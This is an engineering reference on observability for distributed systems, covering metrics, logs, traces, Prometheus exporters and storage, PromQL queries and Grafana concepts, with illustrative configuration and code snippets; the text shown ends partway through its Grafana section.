_A comprehensive engineering reference for DevOps engineers, SREs, platform engineers, cloud architects, and backend engineers operating modern distributed systems._
---
## Table of Contents
1. Introduction to Observability
2. The Three Pillars of Observability
3. Prometheus Architecture
4. Grafana Observability Platform
5. OpenTelemetry
6. Client Application Observability
7. Backend Observability
8. Development Observability
9. Kubernetes Observability
10. Observability Architecture for Large Infrastructure
11. Alerting and Incident Management
12. Observability Data Pipelines
13. Observability Cost Optimization
14. Incident Investigation Using Observability
15. Advanced Observability
16. Observability for Bare-Metal Infrastructure
17. The Future of Observability
18. Large Observability Glossary
19. DevOps Metrics Reference Table
20. Observability Tools Reference Table
---
## 1. Introduction to Observability
### The Limits of Traditional Monitoring
For the first two decades of production systems management, "monitoring" was the primary tool for understanding system health. Monitoring operates on a simple model: define a set of metrics in advance, set threshold values, alert when those thresholds are crossed. Check if the web server process is running. Alert if CPU exceeds 90%. Page if disk fills above 95%.
This model worked adequately when systems were small, when the architecture was a small number of well-understood components running on a predictable number of servers, and when failure modes were well-catalogued. When a monolithic application on a bare-metal server failed, the failure modes were limited: the process crashed, a disk filled, a network interface went down. Threshold-based monitoring could enumerate these possibilities and alert on them.
Distributed systems shatter this model. A microservices architecture running on Kubernetes might involve hundreds of services, thousands of pods, millions of inter-service calls per minute, and failure modes that emerge from the interaction of components — none of which triggered a threshold in isolation. A request might succeed from the perspective of every individual service it traverses while still arriving at the user as a failure, because latency accumulated across five hops to exceed the client timeout. A service might be healthy by every monitored metric while silently returning incorrect data due to a bug in business logic.
Traditional monitoring answers: "Did the thing I already knew to check break?" Observability answers: "What is actually happening, and why?" The distinction is fundamental, not incremental.
### Defining Observability
Observability, in the engineering sense, is a property of a system: the degree to which its internal state can be understood from its external outputs. A system is observable if, given its outputs — metrics, logs, traces — an engineer can determine what it is doing and why, without needing to add new instrumentation each time a new question arises.
This definition, adapted from control systems theory by Charity Majors and others, reframes the problem. Instead of asking "did we monitor for this failure mode?", the question becomes "does our instrumentation allow us to explore and understand arbitrary failure modes?" The first question is bounded by human imagination. The second is bounded only by the quality of the instrumentation.
|Concept|Orientation|Question Answered|Failure Mode of Absence|
|---|---|---|---|
|Monitoring|Predefined metrics, known failure modes|"Is the thing I expect to break, broken?"|Novel failures go undetected|
|Observability|Exploratory, arbitrary system state|"What is happening and why?"|Engineers can detect but not understand failures|
In practice, both are required and complementary. Monitoring provides fast, reliable alerting on well-understood failure modes. Observability provides the investigative capability to understand novel failures that monitoring detects but cannot explain.
### Why Observability Is Critical in Distributed Systems
The case for observability is proportional to system complexity. A single-process application has limited internal state; printf debugging is sufficient. A distributed system with 50 microservices, asynchronous event processing, multiple databases, and external API dependencies has effectively unbounded internal state. At this scale, properties emerge that cannot be understood by examining any individual component.
Consider the failure modes unique to distributed systems:
**Partial failures:** A single replica of a service fails while others remain healthy. Traffic is redistributed. Latency increases slightly at a percentile that no alert fires on. The failing replica is restarted by Kubernetes. The root cause — a memory leak in a specific code path triggered by a specific request pattern — is never investigated because no alert fired.
**Cascading failures:** Service A is slow, which causes connection pool exhaustion in Service B, which causes Service B to time out, which causes error spikes in Service C, which has an alert that fires. The on-call engineer investigates Service C and finds nothing wrong. Without distributed tracing, the causal chain from A to B to C is invisible.
**Configuration-dependent failures:** A deployment changes an environment variable. The change is backward compatible and the service starts successfully. But the new configuration causes a subtle behavioral change that only manifests under load patterns that occur once per day, during the afternoon batch processing window. Without correlation between deployment events and behavioral metrics, this connection takes days to establish.
**Request fanout:** A user-facing API call triggers 12 downstream calls. Three of those calls are to the same slow database table via different code paths. Without tracing, the engineer sees elevated latency on the API endpoint but cannot identify that three independent services are all hitting the same bottleneck.
Observability is the engineering infrastructure that makes these failure modes investigable. Without it, distributed systems engineering is archaeology — reconstructing what happened from fragmentary evidence after the fact, often without the ability to reproduce or fully explain it.
### Observability in Cloud-Native Infrastructure
Cloud-native infrastructure — containerized workloads on Kubernetes, serverless functions, managed cloud services — introduces additional observability challenges that compound those of distributed systems generally.
**Ephemeral infrastructure:** A pod exists for minutes or hours before being replaced. Traditional monitoring assumes a persistent host with a persistent process. When an investigation begins, the failing pod may no longer exist. Logs must be shipped off the pod before it terminates; metrics must be scraped at sufficient frequency to capture the relevant interval; traces must be stored centrally.
**Dynamic topology:** Service discovery, autoscaling, and rolling deployments mean the set of running instances changes continuously. A monitoring system that requires static configuration of targets cannot keep up. Observability infrastructure must use dynamic service discovery.
**Abstracted infrastructure:** In managed Kubernetes (EKS, GKE, AKS), the underlying nodes are largely opaque. In serverless, the entire execution environment is abstracted. Observability must work at the application and platform layer rather than relying on OS-level instrumentation.
**Multi-tenancy:** Shared Kubernetes clusters run workloads from multiple teams. Observability infrastructure must support namespace-level isolation of metrics, logs, and traces, with appropriate access controls that prevent one team from querying another's data.
### Observability in Microservices
Microservices architectures exist on a spectrum of coupling. At one extreme, services are independent, with well-defined contracts, separate deployment pipelines, and separate databases. At the other extreme, services share databases, have implicit contract dependencies, and are deployed as a group. Observability requirements differ along this spectrum, but some principles apply universally.
**Service-level ownership:** Each service team is responsible for the observability of their service. This means defining SLIs and SLOs, instrumenting the service, writing alert rules, and maintaining runbooks. A platform team provides the infrastructure; application teams provide the instrumentation.
**Trace propagation:** For distributed tracing to work across service boundaries, trace context (trace ID, span ID, sampling decision) must be propagated in every inter-service call. This requires consistent use of a propagation standard (W3C TraceContext, B3) across all services, regardless of programming language or framework.
**Cross-service correlation:** An incident in one service often has its root cause in another. Observability infrastructure must allow an engineer to move from a symptom (elevated error rate on the order service) to a cause (slow response from the inventory service) by following traces, correlating metrics across service boundaries, and searching logs with a common request ID.
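Trace propagation is concrete enough to sketch. A W3C TraceContext `traceparent` header has the form `version-traceid-spanid-flags`; the minimal parser below is illustrative only — real services should rely on an instrumentation SDK rather than hand-rolling this:

```python
# Minimal sketch of W3C TraceContext parsing (illustrative; use an
# instrumentation SDK such as OpenTelemetry in real services).
import re

TRACEPARENT_RE = re.compile(
    r"^(?P<version>[0-9a-f]{2})-(?P<trace_id>[0-9a-f]{32})"
    r"-(?P<span_id>[0-9a-f]{16})-(?P<flags>[0-9a-f]{2})$"
)

def parse_traceparent(header: str) -> dict:
    """Extract trace context fields from a traceparent header value."""
    m = TRACEPARENT_RE.match(header)
    if not m:
        raise ValueError(f"malformed traceparent: {header!r}")
    return m.groupdict()

def is_sampled(ctx: dict) -> bool:
    # The low bit of the flags byte is the sampled flag.
    return int(ctx["flags"], 16) & 0x01 == 0x01
```

A downstream service receiving `traceparent: 00-4bf92f3577b34da6a3ce929d0e0e4736-00f067aa0ba902b7-01` extracts the trace ID, attaches it to its own spans and logs, and forwards a new header with its own span ID as the parent.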
---
## 2. The Three Pillars of Observability
### Overview
The three pillars of observability — metrics, logs, and traces — are distinct telemetry types that complement each other. Each answers different questions about system behavior. Together, they provide complete coverage of system state.
|Telemetry Type|Description|Granularity|Cost|Best For|
|---|---|---|---|---|
|Metrics|Time-series numeric values|Aggregated|Low|Alerting, dashboards, trending|
|Logs|Structured or unstructured event records|Per-event|Medium-High|Debugging, audit, error detail|
|Traces|Request path across service boundaries|Per-request|Medium|Latency analysis, dependency mapping|
The key insight is that these three types are not interchangeable — they are complementary, and a production observability stack requires all three. Attempting to use logs as metrics (parsing log lines to extract numbers) works at small scale but becomes operationally expensive and unreliable at production volume. Attempting to use metrics to reconstruct traces (comparing timing of metrics across services) is impossible except in the most trivial cases.
### Metrics
Metrics are numeric measurements captured at regular intervals and stored as time series. Each metric has a name, a timestamp, a value, and a set of labels (also called tags or dimensions) that describe the context of the measurement.
Example metric in Prometheus exposition format:
```
http_requests_total{method="POST", endpoint="/api/payments", status="200"} 15423 1709812345000
```
This encodes: 15,423 POST requests to `/api/payments` returned status 200, as of the given Unix timestamp (in milliseconds, per the exposition format).
**Counters** are metrics that only increase. Total requests, total errors, bytes sent. A counter that is reset indicates a process restart. The rate of change of a counter (using `rate()` in PromQL) gives the per-second rate.
**Gauges** are metrics that can increase or decrease. Current active connections, current memory usage, current queue depth. The current value is meaningful; the rate of change is often also useful.
**Histograms** record the distribution of values across predefined buckets. A request latency histogram with buckets at 10ms, 50ms, 100ms, 500ms, 1000ms allows calculation of percentiles (p50, p95, p99) without storing every individual request's latency. This is the correct data structure for latency SLOs.
**Summaries** are similar to histograms but calculate quantiles client-side, which makes them unsuitable for aggregation across multiple instances (you cannot average percentiles). Prefer histograms.
The power of metrics is in their aggregation properties. The same set of Prometheus metrics from 200 pod replicas can be aggregated with a single PromQL expression to produce a cluster-wide view, a per-namespace view, or a per-team view. This scalability is impossible with log-based approaches.
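The histogram mechanics are worth making concrete. Below is an illustrative cumulative-bucket counter in plain Python — not a Prometheus client library, just a sketch of why percentiles can be estimated from bucket counts without retaining individual samples (real implementations interpolate within the bucket; this sketch returns the bucket's upper bound):

```python
# Illustrative cumulative histogram, mirroring Prometheus semantics:
# each bucket counts observations less than or equal to its bound ("le").
BUCKETS = [0.01, 0.05, 0.1, 0.5, 1.0, float("inf")]

def observe(counts: list[int], value: float) -> None:
    """Increment every bucket whose upper bound covers the value (cumulative)."""
    for i, le in enumerate(BUCKETS):
        if value <= le:
            counts[i] += 1

def quantile(counts: list[int], q: float) -> float:
    """Upper bound of the bucket containing the q-th quantile (no interpolation)."""
    rank = q * counts[-1]          # counts[-1] is the +Inf bucket = total count
    for le, c in zip(BUCKETS, counts):
        if c >= rank:
            return le
    return BUCKETS[-1]
```

Observing latencies of 0.02s, 0.03s, 0.2s, and 0.7s yields counts `[0, 2, 2, 3, 4, 4]`; the p99 estimate is bounded by the 1.0s bucket. Fixed bucket counts are why histograms from 200 replicas can be summed before computing quantiles, which summaries cannot do.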
### Logs
Logs are event records produced by applications and infrastructure, capturing the details of individual occurrences: a request was received, a database query executed, an error was thrown, a user authenticated.
Modern logging practice distinguishes between structured and unstructured logs:
**Unstructured logs** are free-text strings:
```
2024-03-01 14:23:45 ERROR payment_service: failed to process payment for order 12345: connection timeout after 5000ms
```
These are human-readable but computationally expensive to parse and query. Pattern matching is required to extract fields, which is fragile and does not compose.
**Structured logs** are machine-readable records, typically JSON:
```json
{
  "timestamp": "2024-03-01T14:23:45.123Z",
  "level": "ERROR",
  "service": "payment_service",
  "event": "payment_processing_failed",
  "order_id": "12345",
  "error": "connection_timeout",
  "timeout_ms": 5000,
  "trace_id": "4bf92f3577b34da6",
  "span_id": "00f067aa0ba902b7"
}
```
Structured logs can be queried by field, aggregated, and correlated with traces via the `trace_id` field. The `trace_id` field is the critical link between the log pillar and the traces pillar.
**Log levels** carry semantic meaning that must be respected consistently across services:
- `DEBUG`: Detailed diagnostic information, not emitted in production by default
- `INFO`: Normal operational events (request received, job started)
- `WARN`: Unexpected but handled conditions (retry succeeded after initial failure)
- `ERROR`: Failures requiring attention (request failed, unable to connect to dependency)
- `FATAL/CRITICAL`: Unrecoverable errors causing process termination
In high-volume production systems, logging everything at DEBUG level produces log volumes that are economically and operationally unmanageable. Production log levels should be INFO by default, with the ability to dynamically increase verbosity for specific services during incident investigation.
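A structured JSON logger can be built from the Python standard library alone. The sketch below follows the field names in the example above; the static `service` field and the `fields` convention are illustrative choices, and in practice the `trace_id` would be injected by tracing instrumentation:

```python
import json
import logging

class JsonFormatter(logging.Formatter):
    """Render each log record as one JSON object per line."""
    def format(self, record: logging.LogRecord) -> str:
        payload = {
            "timestamp": self.formatTime(record, "%Y-%m-%dT%H:%M:%S"),
            "level": record.levelname,
            "service": "payment_service",  # illustrative static field
            "event": record.getMessage(),
        }
        # Merge structured fields passed via logging's `extra` mechanism.
        payload.update(getattr(record, "fields", {}))
        return json.dumps(payload)

logger = logging.getLogger("payment_service")
handler = logging.StreamHandler()
handler.setFormatter(JsonFormatter())
logger.addHandler(handler)
logger.setLevel(logging.INFO)

logger.error("payment_processing_failed",
             extra={"fields": {"order_id": "12345",
                               "error": "connection_timeout"}})
```

The key property is that every emitted line is queryable by field, so a log backend can filter on `order_id` or `error` without fragile pattern matching.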
### Traces
Distributed tracing tracks the path of a single request as it traverses multiple services, recording the time spent in each component, the context passed between components, and any errors encountered.
A **trace** is the complete record of a request's journey. It consists of one or more **spans**.
A **span** represents a single operation within a trace — a function call, a database query, an HTTP request to a downstream service. Each span has:
- A span ID (unique within the trace)
- A trace ID (shared across all spans in the trace)
- A parent span ID (identifying the calling operation)
- Start time and duration
- Status (OK, Error)
- Attributes (key-value pairs describing the operation)
- Events (timestamped annotations within the span)
The parent-child relationship between spans forms a tree structure — the trace tree — that shows exactly which operations were called, in what order, with what timing, for a single request.
```
Trace: 4bf92f3577b34da6 (200ms total)
│
├── [0ms-200ms] api-gateway: POST /api/orders (200ms)
│ ├── [2ms-15ms] auth-service: ValidateToken (13ms)
│ ├── [16ms-85ms] order-service: CreateOrder (69ms)
│ │ ├── [18ms-40ms] postgres: INSERT orders (22ms)
│ │ └── [42ms-83ms] inventory-service: ReserveItems (41ms)
│ │ └── [44ms-82ms] postgres: UPDATE inventory (38ms)
│ └── [87ms-198ms] notification-service: SendConfirmation (111ms) ← SLOW
│ └── [88ms-197ms] smtp-relay: SendEmail (109ms) ← ROOT CAUSE
```
This trace immediately reveals that the notification service is slow (111ms of the total 200ms) because the SMTP relay is slow (109ms). Without this trace, an engineer investigating elevated API latency would see the api-gateway's latency metric and have no path to the root cause.
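The reasoning the engineer applies here — follow the child span that accounts for most of the parent's time — can be sketched as a walk over the span tree. The structure below is illustrative (real spans carry IDs, status, and attributes as listed earlier in this section):

```python
from dataclasses import dataclass, field

@dataclass
class Span:
    name: str
    start_ms: int
    end_ms: int
    children: list["Span"] = field(default_factory=list)

    @property
    def duration_ms(self) -> int:
        return self.end_ms - self.start_ms

def slowest_path(span: Span) -> list[str]:
    """Follow the longest child at each level -- a crude critical path."""
    path = [span.name]
    while span.children:
        span = max(span.children, key=lambda s: s.duration_ms)
        path.append(span.name)
    return path
```

Applied to the trace above, the walk descends from `api-gateway` to `notification-service` (111ms) to `smtp-relay` (109ms) — the same conclusion the engineer reads off the trace timeline.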
### How the Three Pillars Work Together
The three pillars are most powerful when used in combination, following a workflow that moves from broad signal to specific cause:
1. **Metrics → Alert:** A Prometheus alert fires because `http_error_rate` on the payment API exceeds 5% for 5 minutes.
2. **Metrics → Scope:** The engineer queries Prometheus and identifies that errors are concentrated on the `POST /v1/payments` endpoint, and that the error rate spiked at 14:23 UTC, correlated with a deployment event.
3. **Logs → Detail:** The engineer queries Loki for ERROR-level logs from the payment service in the 14:23-14:35 window and finds structured log entries showing `"event": "payment_processing_failed"` with `"error": "upstream_timeout"`.
4. **Traces → Root Cause:** The engineer queries Tempo for traces from the payment service containing the error. The trace shows the timeout occurring in the call to the fraud-scoring service, which added 6 seconds to payment processing requests after the deployment changed a default timeout value.
5. **Resolution:** Roll back the timeout configuration change. Error rate returns to baseline within 2 minutes.
Without all three pillars, this investigation would have taken significantly longer at each step. Without metrics, the alert would not have fired. Without logs, the error context would not have been visible. Without traces, the fraud-scoring service would not have been identified as the root cause.
---
## 3. Prometheus Architecture
### Overview
Prometheus is a time-series database and monitoring system originally developed at SoundCloud and donated to the CNCF (Cloud Native Computing Foundation) in 2016. It has become the de facto standard for metrics collection in cloud-native infrastructure. Its design reflects hard lessons from operating large-scale distributed systems.
The core design principles of Prometheus:
**Pull-based collection:** Prometheus scrapes metrics from targets (applications and exporters) by making HTTP requests to a `/metrics` endpoint. Targets do not push metrics to Prometheus. This inverts the common model and has important reliability properties: Prometheus controls the collection rate, targets do not need to know the address of the Prometheus server, and it is immediately visible when a target becomes unreachable (the scrape fails).
**Dimensional data model:** Metrics are identified by name and a set of key-value label pairs. The same metric name with different label values represents different time series. This allows powerful aggregation: `sum(http_requests_total) by (service)` aggregates across all method, endpoint, and status combinations to give total requests per service.
**Local storage:** Prometheus stores metrics locally on disk using a custom time-series database engine (TSDB). This keeps operational complexity low and delivers good performance for typical query patterns, at the cost of being bounded by a single node's disk and memory.
**PromQL:** A powerful functional query language purpose-built for time-series data. PromQL supports aggregation, arithmetic, vector matching, and time-based functions that make it possible to express complex reliability metrics in a single expression.
### The Prometheus Data Model
Every Prometheus metric is a combination of a metric name and zero or more labels:
```
<metric_name>{<label_name>=<label_value>, ...}
```
Example: `node_cpu_seconds_total{cpu="0", mode="idle"}`
Labels are the primary mechanism for filtering and aggregation. A Prometheus deployment might have 500,000 unique time series, all derived from a small number of metric names with many label combinations.
**Cardinality** is the number of unique time series for a metric, determined by the number of unique label value combinations. High-cardinality labels — labels with many possible values, such as user IDs, IP addresses, or request IDs — create time series counts that grow unboundedly and cause memory and storage issues. This is one of the primary operational challenges in large Prometheus deployments.
Bad practice: `http_requests_total{user_id="12345"}` — unique user IDs create millions of time series. Good practice: `http_requests_total{endpoint="/api/payments", status="200"}` — bounded label values.
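Because cardinality grows multiplicatively with label values, it is easy to estimate before shipping a metric. A back-of-envelope check (illustrative; label value counts are assumptions for the example):

```python
from math import prod

def estimated_series(label_values: dict[str, int]) -> int:
    """Worst-case time series count: product of distinct values per label."""
    return prod(label_values.values())

# Bounded labels: a few thousand series per metric -- manageable.
bounded = estimated_series({"endpoint": 50, "method": 4, "status": 10})

# Adding a user_id label multiplies every existing series by the user count.
unbounded = estimated_series({"endpoint": 50, "method": 4, "status": 10,
                              "user_id": 1_000_000})
```

Here the bounded metric yields 2,000 series, while adding `user_id` explodes it to two billion — the multiplicative effect is why a single high-cardinality label can take down a Prometheus server.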
### Prometheus Components
**Prometheus Server:** The core component. Responsible for service discovery, scraping metrics from targets, storing time series data, evaluating alerting rules, and serving the HTTP API used by Grafana and other consumers. It is a single binary, intentionally simple to deploy.
**Exporters:** Adapter processes that collect metrics from systems that do not natively expose Prometheus metrics and translate them to the Prometheus exposition format. Exporters run alongside the target system and expose a `/metrics` HTTP endpoint that Prometheus scrapes.
**Alertmanager:** A separate component that receives alerts from Prometheus (and other compatible sources), deduplicates them, groups them, applies routing rules, and delivers them to notification destinations (email, Slack, PagerDuty, OpsGenie, webhooks).
**Pushgateway:** A component that allows short-lived batch jobs to push metrics that would not be available for a pull-based scrape. The Pushgateway stores the last pushed value and exposes it to Prometheus. It should be used sparingly — only for genuinely ephemeral jobs — because it breaks the pull model's reliability properties.
**Service Discovery:** Prometheus supports dynamic service discovery from many sources: Kubernetes (pods, services, endpoints), cloud providers (EC2, GCE, Azure), DNS SRV records, Consul, and static configuration. Dynamic discovery is essential for environments where targets appear and disappear.
|Component|Role|Deployment Model|Key Consideration|
|---|---|---|---|
|Prometheus Server|Scraping, storage, rule evaluation|Single process, local disk|Memory proportional to active time series|
|Alertmanager|Alert routing and deduplication|Clustered for HA|Shared state between instances required|
|Node Exporter|OS and hardware metrics|DaemonSet (Kubernetes) / systemd|One per node|
|kube-state-metrics|Kubernetes object state|Single deployment|Cluster-scoped access required|
|cAdvisor|Container resource metrics|Built into kubelet|Access via kubelet metrics API|
|Blackbox Exporter|External endpoint probing|Centrally deployed|Probe from multiple locations for accuracy|
|Pushgateway|Ephemeral job metrics|Centrally deployed|Not suitable for persistent services|
### Core Exporters in Depth
**node_exporter**
The node_exporter is the standard exporter for Linux/Unix operating system and hardware metrics. It runs as a privileged process on each host and exposes hundreds of metrics covering:
- CPU utilization and saturation (`node_cpu_seconds_total`, `node_load1`)
- Memory usage, available, cached, buffers (`node_memory_MemFree_bytes`, `node_memory_MemAvailable_bytes`)
- Disk I/O operations and bytes (`node_disk_io_time_seconds_total`, `node_disk_read_bytes_total`)
- Filesystem usage (`node_filesystem_avail_bytes`, `node_filesystem_size_bytes`)
- Network interface traffic and errors (`node_network_receive_bytes_total`, `node_network_transmit_errs_total`)
- System processes and file descriptors (`node_procs_running`, `node_filefd_allocated`)
In Kubernetes, node_exporter is deployed as a DaemonSet to ensure exactly one instance runs per node:
```yaml
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: node-exporter
  namespace: monitoring
spec:
  selector:
    matchLabels:
      app: node-exporter
  template:
    metadata:
      labels:
        app: node-exporter    # must match spec.selector.matchLabels
    spec:
      hostNetwork: true
      hostPID: true
      containers:
        - name: node-exporter
          image: prom/node-exporter:v1.7.0
          args:
            - --path.sysfs=/host/sys
            - --path.rootfs=/host/root
          ports:
            - containerPort: 9100
          volumeMounts:
            - name: sys
              mountPath: /host/sys
              readOnly: true
            - name: root
              mountPath: /host/root
              readOnly: true
      volumes:
        - name: sys
          hostPath:
            path: /sys
        - name: root
          hostPath:
            path: /
```
**kube-state-metrics**
While node_exporter and cAdvisor focus on resource utilization, kube-state-metrics exposes the state of Kubernetes objects: deployments, pods, nodes, namespaces, services, and more. It watches the Kubernetes API server and generates metrics reflecting the desired and actual state of cluster resources.
Critical metrics from kube-state-metrics:
- `kube_pod_status_phase` — is a pod running, pending, or failed?
- `kube_deployment_status_replicas_available` — how many replicas are available vs desired?
- `kube_node_status_condition` — is a node Ready, has it hit memory pressure or disk pressure?
- `kube_pod_container_status_restarts_total` — how many times has a container restarted?
- `kube_horizontalpodautoscaler_status_current_replicas` — current replica count from HPA
- `kube_job_status_failed` — did a Kubernetes Job fail?
- `kube_persistentvolumeclaim_status_phase` — is a PVC bound?
These metrics are essential for alerting on cluster state issues that are not reflected in resource utilization metrics.
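As a sketch of how these metrics translate into alerts, a Prometheus rule file might contain the following. Thresholds, durations, and alert names here are illustrative, not recommendations:

```yaml
groups:
  - name: kubernetes-state
    rules:
      # Container restarting repeatedly: more than 3 restarts in 15 minutes.
      - alert: KubePodCrashLooping
        expr: increase(kube_pod_container_status_restarts_total[15m]) > 3
        for: 15m
        labels:
          severity: warning
        annotations:
          summary: "Pod {{ $labels.namespace }}/{{ $labels.pod }} is restarting repeatedly"

      # Deployment has fewer available replicas than desired.
      - alert: KubeDeploymentReplicasMismatch
        expr: |
          kube_deployment_status_replicas_available
            < kube_deployment_spec_replicas
        for: 15m
        labels:
          severity: warning
```

Both rules alert on desired-vs-actual state divergence, which resource utilization metrics alone cannot express.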
**cAdvisor**
cAdvisor (Container Advisor) is integrated into the kubelet and collects per-container resource metrics:
- `container_cpu_usage_seconds_total` — CPU time consumed by container
- `container_memory_working_set_bytes` — memory in use (the figure relevant to OOM killer)
- `container_memory_rss` — resident set size
- `container_network_receive_bytes_total` — bytes received on container network interface
- `container_fs_reads_bytes_total` — bytes read from filesystem
cAdvisor metrics have a rich label set: container name, pod name, namespace, and image. This allows precise attribution of resource consumption.
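These labels make per-team attribution a short query. For example (illustrative PromQL against the standard cAdvisor metric and label names above):

```
# CPU cores consumed per namespace, averaged over 5 minutes
sum(rate(container_cpu_usage_seconds_total[5m])) by (namespace)

# Memory working set as a fraction of the container limit --
# values near 1.0 are candidates for OOM kills
container_memory_working_set_bytes
  / on (namespace, pod, container)
    container_spec_memory_limit_bytes
```

The second expression assumes memory limits are set; containers without limits report a zero limit and should be filtered out in practice.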
**Blackbox Exporter**
The blackbox exporter probes external endpoints using HTTP, HTTPS, TCP, ICMP, and DNS, and reports on their availability and response characteristics. Unlike the other exporters, which instrument internal systems, the blackbox exporter represents the user's perspective: is the endpoint reachable, responding correctly, and within acceptable latency?
Example blackbox probe configuration:
```yaml
modules:
  http_2xx:
    prober: http
    timeout: 5s
    http:
      valid_http_versions: ["HTTP/1.1", "HTTP/2.0"]
      valid_status_codes: []  # Defaults to 2xx
      method: GET
      tls_config:
        insecure_skip_verify: false
  http_post_json:
    prober: http
    http:
      method: POST
      headers:
        Content-Type: application/json
      body: '{"health": "check"}'
      valid_status_codes: [200, 201]
```
Prometheus scrape configuration for blackbox:
```yaml
- job_name: 'blackbox_http'
  metrics_path: /probe
  params:
    module: [http_2xx]
  static_configs:
    - targets:
        - https://api.example.com/health
        - https://payments.example.com/v1/health
  relabel_configs:
    - source_labels: [__address__]
      target_label: __param_target
    - source_labels: [__param_target]
      target_label: instance
    - target_label: __address__
      replacement: blackbox-exporter:9115
```
### Prometheus Storage Model
Prometheus stores time-series data using the TSDB (Time Series Database), a custom storage engine optimized for append-only time-series writes and range queries.
The TSDB organizes data into 2-hour blocks. Each block is an immutable directory containing:
- Chunks: compressed time-series data (using Gorilla compression — typically 1.3 bytes per sample)
- Index: mapping from label sets to chunk locations
- Tombstones: records of deleted time series
- Meta: block metadata
Data is first written to an in-memory structure (the head block) and WAL (Write-Ahead Log). Every 2 hours, the head block is persisted to disk as a new block. Older blocks are periodically compacted into larger blocks to improve query performance.
The compaction process also applies retention: blocks outside the retention window (default: 15 days) are deleted. Extending retention is possible, but disk requirements grow proportionally with the window; memory is driven primarily by the number of active time series rather than by retention length.
**Storage capacity estimation:**
```
Storage ≈ time series count × samples per second per series × bytes per sample × retention period (seconds)
= 500,000 series × (1 sample / 15s) × 1.3 bytes × (15 days × 86400s/day)
= 500,000 × 5,760 samples/day × 1.3 bytes × 15 days
≈ 56 GB
```
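The same estimate can be packaged as a reusable function. This is a rough sketch: real usage varies with series churn, label sizes, and compression ratio, so treat the output as an order-of-magnitude figure:

```python
def prometheus_storage_bytes(series: int,
                             scrape_interval_s: float,
                             retention_days: float,
                             bytes_per_sample: float = 1.3) -> float:
    """Approximate TSDB disk usage: samples over retention x bytes/sample.

    bytes_per_sample defaults to ~1.3, the typical figure for
    Gorilla-compressed chunks cited above.
    """
    samples_per_series = retention_days * 86_400 / scrape_interval_s
    return series * samples_per_series * bytes_per_sample

# The worked example above: 500k series, 15s scrape, 15-day retention.
gb = prometheus_storage_bytes(500_000, 15, 15) / 1e9  # ~56 GB
```

Doubling retention or halving the scrape interval each doubles the estimate, which makes the trade-offs in the next paragraph easy to quantify.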
For large deployments, Prometheus's local storage is a bottleneck. Long-term storage requires either Thanos, Cortex, or Grafana Mimir — distributed, horizontally-scalable systems that use object storage (S3, GCS) as their backend.
### PromQL Fundamentals
PromQL is the query language used to select and aggregate Prometheus metrics. Understanding PromQL is essential for writing alert rules and building dashboards.
**Instant vector selector:** Returns the current value of a metric:
```
http_requests_total{service="payment", status=~"5.."}
```
The `=~` operator uses regex matching. This selects all 5xx responses for the payment service.
**Range vector selector:** Returns a range of values over a time window:
```
http_requests_total{service="payment"}[5m]
```
Returns all samples in the last 5 minutes. Used as input to functions like `rate()`.
**rate():** Calculates the per-second rate of increase of a counter over a time window:
```
rate(http_requests_total{service="payment"}[5m])
```
Returns the per-second request rate, averaged over the last 5 minutes.
**irate():** Instant rate — based on the last two samples only. More responsive to spikes, but noisier:
```
irate(http_requests_total{service="payment"}[5m])
```
**sum() by:** Aggregates across label dimensions:
```
sum(rate(http_requests_total[5m])) by (service)
```
Returns per-service request rate.
**histogram_quantile():** Calculates percentiles from a histogram metric:
```
histogram_quantile(0.99, sum(rate(http_request_duration_seconds_bucket[5m])) by (le, service))
```
Returns p99 latency per service. Grouping by `le` preserves the histogram bucket boundaries required for quantile calculation; grouping by `service` keeps the result broken out per service.
**Error rate calculation:**
```
sum(rate(http_requests_total{status=~"5.."}[5m])) by (service)
/
sum(rate(http_requests_total[5m])) by (service)
```
Returns the error rate as a fraction (0.0 - 1.0) per service. Multiply by 100 for percentage.
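Wrapped in a Prometheus alerting rule, the error-rate expression above becomes the following. The 5% threshold and 5-minute window are illustrative, not recommendations:

```yaml
groups:
  - name: service-errors
    rules:
      - alert: HighErrorRate
        expr: |
          sum(rate(http_requests_total{status=~"5.."}[5m])) by (service)
            / sum(rate(http_requests_total[5m])) by (service)
          > 0.05
        for: 5m
        labels:
          severity: critical
        annotations:
          summary: "{{ $labels.service }} error rate above 5% for 5 minutes"
```

The `for: 5m` clause requires the condition to hold continuously before firing, which suppresses transient spikes.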
---
## 4. Grafana Observability Platform
### Overview
Grafana is the leading open-source platform for data visualization and observability. What began as a Graphite dashboard tool has evolved into a comprehensive observability platform with support for dozens of data sources, a sophisticated alerting engine, and a full ecosystem of companion tools for log management, distributed tracing, and large-scale metrics storage.
Grafana's architecture is deliberately data-source agnostic. Rather than requiring data to be stored in a proprietary format, Grafana integrates with existing storage systems via data source plugins. This means an organization can adopt Grafana incrementally — connecting it first to an existing Prometheus deployment, then adding Loki for logs, then Tempo for traces — without migrating data or replacing infrastructure.
### Grafana Core Concepts
**Dashboards** are the primary unit of Grafana's visualization system. A dashboard is a collection of panels arranged in a grid, sharing a time range selector and variable system. Dashboards can be parameterized with variables (dropdown selectors for namespace, service, environment) that modify queries across all panels simultaneously.
**Panels** are individual visualization units within a dashboard. Each panel queries one or more data sources and renders the result using a visualization type. Core panel types:
- **Time series:** Line chart for metric data over time. The default for most observability dashboards.
- **Stat:** Single large number display. Useful for current values, counts, rates.
- **Gauge:** Visual gauge for utilization metrics (CPU%, memory%).
- **Bar chart / Histogram:** Distribution visualization.
- **Table:** Tabular display for multi-column data.
- **Heatmap:** Two-dimensional density visualization. Excellent for latency distribution over time (showing the full distribution of request latencies, not just percentiles).
- **Logs:** Native log display panel for Loki data sources.
- **Node graph:** Directed graph visualization for service topology and dependency mapping.
- **Traces:** Native trace timeline visualization for Tempo data sources.
- **Canvas:** Custom diagrammatic layouts with live data binding.
**Data sources** are the connections from Grafana to backing storage systems. Each data source plugin understands the query language and API of the backing system and translates Grafana's internal query model to native queries. Core data sources: Prometheus, Grafana Loki, Grafana Tempo, Grafana Mimir, Elasticsearch, CloudWatch, PostgreSQL, InfluxDB.
**Alerting** in Grafana (Grafana Alerting, distinct from the legacy per-panel alerting system) provides a centralized alert management system with rule evaluation, contact points, notification policies, and silencing. Grafana Alerting supports Prometheus-compatible alert rules and can evaluate queries against any supported data source.
**Variables** parameterize dashboards by allowing dynamic substitution of values in queries. A variable might be defined as a query against Prometheus to return all unique `namespace` label values, creating a dropdown that filters the entire dashboard to a specific namespace.
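For example, with a Prometheus data source, a `namespace` variable is commonly defined using Grafana's `label_values` helper (a dashboard-side templating function, not PromQL; the metric name here is illustrative):

```
label_values(kube_pod_info, namespace)
```

The resulting dropdown can then be referenced in panel queries as `$namespace`.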
